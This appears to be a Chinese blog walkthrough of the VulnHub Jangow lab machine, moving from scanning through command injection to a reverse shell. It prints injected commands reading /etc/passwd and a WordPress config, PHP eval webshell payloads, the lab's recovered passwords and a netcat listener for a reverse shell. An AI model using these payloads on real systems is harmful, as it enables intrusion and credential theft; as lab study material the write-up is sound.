jangow靶机渗透

1.环境准备

靶场地址:Jangow: 1.0.1 ~ VulnHub 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 攻击机:kali(192.168.239.128) 靶机:JANGOW(192.168.239.130) 目标:提升为root权限获取root目录下的flag

2.信息收集

arp-scan -l确认目标ip

扫描开放的端口,21和80端口开放

 

找到一个超链接

尝试点击不同页面,点击其他链接Buscar

跳转到http://192.168.239.130/site/busque.php?buscar=

发现/site/busque.php?buscar=,尝试http://192.168.239.130/site/busque.php?buscar=ls

执行命令/site/busque.php?buscar=whoami查看当前用户

cat /etc/passwd,本机用户:有一个普通用户jangow01和root有shell权限

netstat -napt,发现靶机监听3306,22,80,21端口

手动扫描开放的端口,只扫描到80和21,说明靶机可能对3306和22做了过滤

使用dirb扫描网站目录,发现wordpress,#dirb http://192.168.239.130

查看wordpress下文件,找到config.php

改后缀后查看文件http://192.168.239.130/site/busque.php?buscar=cp%20wordpress/config.php%20wordpress/config.txt

使用得到的用户名尝试登陆,failed

向网站根目录写入webshell/site/busque.php?buscar=echo '<?php @eval($_POST['glc']); ?>' >> glc.php

查看是否成功,http://192.168.239.130/site/busque.php?buscar=ls

连接shell

产看文件,发现html目录下有个隐藏文件.backup

查看jangow01的home目录,找到user.txt,

get user.txt下载到本地,md5解密发现为空

目前已经获得的信息:

(1)监听了3306、21、80、22端口,但是只端口探测只扫到80、21,可能有防火墙

(2)用户名:jangow01 密码:abygurl69,可登录ftp,ftp的版本信息为vsftpd3.0.3,在jangow01的家目录中找到了一个空flag,但是ftp的权限不允许上传文件

(3)用户名:desafio02 密码:abygurl69,ftp、mysql均连接不成功

(4)网站存在一个命令执行漏洞: http://192.168.239.130/site/busque.php?buscar=ls

3.信息利用

使用命令执行漏洞写入

192.168.239.130/site/busque.php?buscar=echo '<?php @eval($_POST["cmd"]) ?>' > a.php

探测一下从靶机到外部哪些端口是开放的。原理:在KALI上配置一条iptables规则,将到1-65535端口的流量全部重定向到4444端口,在KALI上监听4444端口,然后再从靶机上发起到1-65535的访问,如果到某个端口的流量未被拦截,那么到该端口的流量将成功转发到4444端口。

antsword文件管理中新建文件,并写入如下的内容

在蚁剑的虚拟终端中执行脚本:./b.sh,不行

新建shell.php文件

攻击机开启443端口监听

nc -lvvp 443

用浏览器去访问shell.php文件,成功反弹shell

  • 23
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值